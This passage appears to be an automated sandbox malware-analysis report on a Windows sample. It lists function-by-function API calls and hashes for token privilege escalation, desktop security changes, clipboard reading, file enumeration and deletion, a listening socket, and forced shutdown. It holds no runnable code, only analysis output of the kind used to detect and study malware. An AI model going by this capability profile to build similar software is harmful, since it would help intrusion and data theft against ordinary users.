                                                                      • Instruction Fuzzy Hash: 6F317271A80318BFEB21ABF55C4AFBF7E6DFB44B61F100065FA01E61D1D6B05D41AAA0
                                                                      Function 00A21201 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00A216C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A2170D
                                                                        • Part of subcall function 00A216C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A2173A
                                                                        • Part of subcall function 00A216C3: GetLastError.KERNEL32 ref: 00A2174A
                                                                      • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00A21286
                                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00A212A8
                                                                      • CloseHandle.KERNEL32(?), ref: 00A212B9
                                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00A212D1
                                                                      • GetProcessWindowStation.USER32 ref: 00A212EA
                                                                      • SetProcessWindowStation.USER32(00000000), ref: 00A212F4
                                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00A21310
                                                                        • Part of subcall function 00A210BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00A211FC), ref: 00A210D4
                                                                        • Part of subcall function 00A210BF: CloseHandle.KERNEL32(?,?,00A211FC), ref: 00A210E9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                      • String ID: $default$winsta0
                                                                      • API String ID: 22674027-1027155976
                                                                      • Opcode ID: b48cc945de4ca86ad437a6f542d46a3b59bdb8f6643a716cc531bd6ccc7cb68b
                                                                      • Instruction ID: b89935e611fceeba11749a2de2f3141587dced50b2e2dddd547148f0d481bf5e
                                                                      • Opcode Fuzzy Hash: b48cc945de4ca86ad437a6f542d46a3b59bdb8f6643a716cc531bd6ccc7cb68b
                                                                      • Instruction Fuzzy Hash: 46817BB1A00319AFDF21EFA8EC49BEE7BB9FF04715F144129F915A61A0D7318A45CB60
                                                                      Function 00A20B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00A210F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00A21114
                                                                        • Part of subcall function 00A210F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00A20B9B,?,?,?), ref: 00A21120
                                                                        • Part of subcall function 00A210F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00A20B9B,?,?,?), ref: 00A2112F
                                                                        • Part of subcall function 00A210F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00A20B9B,?,?,?), ref: 00A21136
                                                                        • Part of subcall function 00A210F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00A2114D
                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00A20BCC
                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00A20C00
                                                                      • GetLengthSid.ADVAPI32(?), ref: 00A20C17
                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00A20C51
                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00A20C6D
                                                                      • GetLengthSid.ADVAPI32(?), ref: 00A20C84
                                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00A20C8C
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00A20C93
                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00A20CB4
                                                                      • CopySid.ADVAPI32(00000000), ref: 00A20CBB
                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00A20CEA
                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00A20D0C
                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00A20D1E
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A20D45
                                                                      • HeapFree.KERNEL32(00000000), ref: 00A20D4C
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A20D55
                                                                      • HeapFree.KERNEL32(00000000), ref: 00A20D5C
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A20D65
                                                                      • HeapFree.KERNEL32(00000000), ref: 00A20D6C
                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00A20D78
                                                                      • HeapFree.KERNEL32(00000000), ref: 00A20D7F
                                                                        • Part of subcall function 00A21193: GetProcessHeap.KERNEL32(00000008,00A20BB1,?,00000000,?,00A20BB1,?), ref: 00A211A1
                                                                        • Part of subcall function 00A21193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00A20BB1,?), ref: 00A211A8
                                                                        • Part of subcall function 00A21193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00A20BB1,?), ref: 00A211B7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                      • String ID:
                                                                      • API String ID: 4175595110-0
                                                                      • Opcode ID: 142d8ee716ac113be4dd55da1619efa903a442f0d406013106387ebf4ce7b07c
                                                                      • Instruction ID: 654301a1b1cdf3eee7568b1f6d23c56689028ffb2af4688341c5b2a38ecb1819
                                                                      • Opcode Fuzzy Hash: 142d8ee716ac113be4dd55da1619efa903a442f0d406013106387ebf4ce7b07c
                                                                      • Instruction Fuzzy Hash: 73713A7190132AAFDF10DFE8EC44FAEBBB8BF04311F144625E915A6192D771A906CF60
                                                                      Function 00A3EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • OpenClipboard.USER32(00A5CC08), ref: 00A3EB29
                                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 00A3EB37
                                                                      • GetClipboardData.USER32(0000000D), ref: 00A3EB43
                                                                      • CloseClipboard.USER32 ref: 00A3EB4F
                                                                      • GlobalLock.KERNEL32(00000000), ref: 00A3EB87
                                                                      • CloseClipboard.USER32 ref: 00A3EB91
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00A3EBBC
                                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 00A3EBC9
                                                                      • GetClipboardData.USER32(00000001), ref: 00A3EBD1
                                                                      • GlobalLock.KERNEL32(00000000), ref: 00A3EBE2
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00A3EC22
                                                                      • IsClipboardFormatAvailable.USER32(0000000F), ref: 00A3EC38
                                                                      • GetClipboardData.USER32(0000000F), ref: 00A3EC44
                                                                      • GlobalLock.KERNEL32(00000000), ref: 00A3EC55
                                                                      • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00A3EC77
                                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00A3EC94
                                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00A3ECD2
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00A3ECF3
                                                                      • CountClipboardFormats.USER32 ref: 00A3ED14
                                                                      • CloseClipboard.USER32 ref: 00A3ED59
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                      • String ID:
                                                                      • API String ID: 420908878-0
                                                                      • Opcode ID: 7f09664d53b06bb57596f25074de3dcb31f44b2466a778c3e23657aa398be18b
                                                                      • Instruction ID: 34fbf24ac82c78d024f983d4842a55e289694efd628580e6f56d50aacbe297aa
                                                                      • Opcode Fuzzy Hash: 7f09664d53b06bb57596f25074de3dcb31f44b2466a778c3e23657aa398be18b
                                                                      • Instruction Fuzzy Hash: 6561AB34204301AFD300EF64D899F6AB7A8BF84764F14855DF4569B2E2CB31ED46CBA2
                                                                      Function 00A3698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00A369BE
                                                                      • FindClose.KERNEL32(00000000), ref: 00A36A12
                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A36A4E
                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A36A75
                                                                        • Part of subcall function 009C9CB3: _wcslen.LIBCMT ref: 009C9CBD
                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A36AB2
                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A36ADF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                      • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                      • API String ID: 3830820486-3289030164
                                                                      • Opcode ID: f1919c74aa35926b86e6ac5bbb146c618d6dd47ab191c8be71689ae2954283ec
                                                                      • Instruction ID: ae8354c9fda06661d9ea636d026f3aac5514afe73d5f45d82bd1aa5c43c55f3b
                                                                      • Opcode Fuzzy Hash: f1919c74aa35926b86e6ac5bbb146c618d6dd47ab191c8be71689ae2954283ec
                                                                      • Instruction Fuzzy Hash: 28D13E72908340AFC710EBA4D996FABB7E8AF88704F04491DF589D6191EB74DA44CB62
                                                                      Function 00A39642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 00A39663
                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00A396A1
                                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 00A396BB
                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00A396D3
                                                                      • FindClose.KERNEL32(00000000), ref: 00A396DE
                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00A396FA
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00A3974A
                                                                      • SetCurrentDirectoryW.KERNEL32(00A86B7C), ref: 00A39768
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00A39772
                                                                      • FindClose.KERNEL32(00000000), ref: 00A3977F
                                                                      • FindClose.KERNEL32(00000000), ref: 00A3978F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                      • String ID: *.*
                                                                      • API String ID: 1409584000-438819550
                                                                      • Opcode ID: 2d821c0f5210965fa5a034f7c4c69c74bf00a524e1ae152af65fee6c58ac1c8a
                                                                      • Instruction ID: 69f828b8d6d81c4963f436a04e0a295d3a66f88f9f83bd74bb2bcfebcdad8f15
                                                                      • Opcode Fuzzy Hash: 2d821c0f5210965fa5a034f7c4c69c74bf00a524e1ae152af65fee6c58ac1c8a
                                                                      • Instruction Fuzzy Hash: 9C31AB3264171A7EDB10EFB4DC49AEF77ACAF49331F104166F915E21A0EBB4DE458A20
                                                                      Function 00A3979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 00A397BE
                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00A39819
                                                                      • FindClose.KERNEL32(00000000), ref: 00A39824
                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00A39840
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00A39890
                                                                      • SetCurrentDirectoryW.KERNEL32(00A86B7C), ref: 00A398AE
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00A398B8
                                                                      • FindClose.KERNEL32(00000000), ref: 00A398C5
                                                                      • FindClose.KERNEL32(00000000), ref: 00A398D5
                                                                        • Part of subcall function 00A2DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00A2DB00
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                      • String ID: *.*
                                                                      • API String ID: 2640511053-438819550
                                                                      • Opcode ID: 4f4445430a492298e637714712c12b56a80b962a1c0a3201ee452b95e0cb8608
                                                                      • Instruction ID: 45cdfbd4729cf8a604bcc75ab81d94b60a348eb46ef99db182f7c547fa5e59ed
                                                                      • Opcode Fuzzy Hash: 4f4445430a492298e637714712c12b56a80b962a1c0a3201ee452b95e0cb8608
                                                                      • Instruction Fuzzy Hash: CA31AE3254071A7EEB10EFA4EC48ADF77ACAF86335F104565F914A21A1DBB0DE85CA60
                                                                      Function 00A38195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLocalTime.KERNEL32(?), ref: 00A38257
                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A38267
                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00A38273
                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A38310
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00A38324
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00A38356
                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00A3838C
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00A38395
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentDirectoryTime$File$Local$System
                                                                      • String ID: *.*
                                                                      • API String ID: 1464919966-438819550
                                                                      • Opcode ID: e33b5a944085179654e49efb61a0ea4e1338e365bb77158375b011179fc0a37b
                                                                      • Instruction ID: 3522f84bf16a1b8165ca86eddcd672524166c7b9d91ad70224363dd223f2bf20
                                                                      • Opcode Fuzzy Hash: e33b5a944085179654e49efb61a0ea4e1338e365bb77158375b011179fc0a37b
                                                                      • Instruction Fuzzy Hash: 0B6169B25043459FC710EF64C841AAEB3E8FF89324F04892EF99997251DB35E945CB92
                                                                      Function 00A2D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 009C3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009C3A97,?,?,009C2E7F,?,?,?,00000000), ref: 009C3AC2
                                                                        • Part of subcall function 00A2E199: GetFileAttributesW.KERNEL32(?,00A2CF95), ref: 00A2E19A
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00A2D122
                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00A2D1DD
                                                                      • MoveFileW.KERNEL32(?,?), ref: 00A2D1F0
                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 00A2D20D
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00A2D237
                                                                        • Part of subcall function 00A2D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00A2D21C,?,?), ref: 00A2D2B2
                                                                      • FindClose.KERNEL32(00000000,?,?,?), ref: 00A2D253
                                                                      • FindClose.KERNEL32(00000000), ref: 00A2D264
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                      • String ID: \*.*
                                                                      • API String ID: 1946585618-1173974218
                                                                      • Opcode ID: 3daa799567e0465454a22b776b4a1080549ff961c09951c634ff7ef4b2bc36b7
                                                                      • Instruction ID: a8152690841d442b4e9df22ddbc56aebf67652ce227d7a30c24faef213853fa4
                                                                      • Opcode Fuzzy Hash: 3daa799567e0465454a22b776b4a1080549ff961c09951c634ff7ef4b2bc36b7
                                                                      • Instruction Fuzzy Hash: E8611931C0125DAECF05EBA4EA52EEDB7B5AF55300F248169E40277192EB30AF09CB61
                                                                      Function 00A3ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                      • String ID:
                                                                      • API String ID: 1737998785-0
                                                                      • Opcode ID: ac0692ea9c6c9f34ef0616cae4c8ee075f1f754e4f32c581b25ca5969bbf1e7c
                                                                      • Instruction ID: 07336cedf468108a8d49b9222a29bc719c4a4e6c5a821ae80ebaff27cfd72392
                                                                      • Opcode Fuzzy Hash: ac0692ea9c6c9f34ef0616cae4c8ee075f1f754e4f32c581b25ca5969bbf1e7c
                                                                      • Instruction Fuzzy Hash: AA418935604611AFE320DF55D888F2ABBA5FF44329F148099F4198BAA2C735ED42CB91
                                                                      Function 00A2E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00A216C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A2170D
                                                                        • Part of subcall function 00A216C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A2173A
                                                                        • Part of subcall function 00A216C3: GetLastError.KERNEL32 ref: 00A2174A
                                                                      • ExitWindowsEx.USER32(?,00000000), ref: 00A2E932
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                      • String ID: $ $@$SeShutdownPrivilege
                                                                      • API String ID: 2234035333-3163812486
                                                                      • Opcode ID: 9d2664f8931109b18d803261d7bd68069d11dec6121d4c785357c3cfa4c08c4b
                                                                      • Instruction ID: a097e4ba8196377d7b2abc43ca4cce4ed92629b4b8ef590321bcb9c40e60ae1f
                                                                      • Opcode Fuzzy Hash: 9d2664f8931109b18d803261d7bd68069d11dec6121d4c785357c3cfa4c08c4b
                                                                      • Instruction Fuzzy Hash: 7E01D672610331AFEB54A7BCBC8ABBFB26CA714751F150833F812E21D1E5A05CC48294
                                                                      Function 00A41204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00A41276
                                                                      • WSAGetLastError.WSOCK32 ref: 00A41283
                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00A412BA
                                                                      • WSAGetLastError.WSOCK32 ref: 00A412C5
                                                                      • closesocket.WSOCK32(00000000), ref: 00A412F4
                                                                      • listen.WSOCK32(00000000,00000005), ref: 00A41303
                                                                      • WSAGetLastError.WSOCK32 ref: 00A4130D
                                                                      • closesocket.WSOCK32(00000000), ref: 00A4133C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$closesocket$bindlistensocket
                                                                      • String ID:
                                                                      • API String ID: 540024437-0
                                                                      • Opcode ID: 4bd7755cf7e523ec657782c0e57c5042537adf990a82adb3510937dbdd758e63
                                                                      • Instruction ID: 167829208d6dd41ae78f306b6c916a70d4a79f8ac1e8b2856e9ee8ef9dda04ec
                                                                      • Opcode Fuzzy Hash: 4bd7755cf7e523ec657782c0e57c5042537adf990a82adb3510937dbdd758e63
                                                                      • Instruction Fuzzy Hash: 0C417275A002409FD710DF64C489B69BBE5BF86328F18819CE8569F396C771ED82CBE1
                                                                      Function 009FB952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _free.LIBCMT ref: 009FB9D4
                                                                      • _free.LIBCMT ref: 009FB9F8
                                                                      • _free.LIBCMT ref: 009FBB7F
                                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00A63700), ref: 009FBB91
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00A9121C,000000FF,00000000,0000003F,00000000,?,?), ref: 009FBC09
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00A91270,000000FF,?,0000003F,00000000,?), ref: 009FBC36
                                                                      • _free.LIBCMT ref: 009FBD4B
                                                                      Memory Dump Source
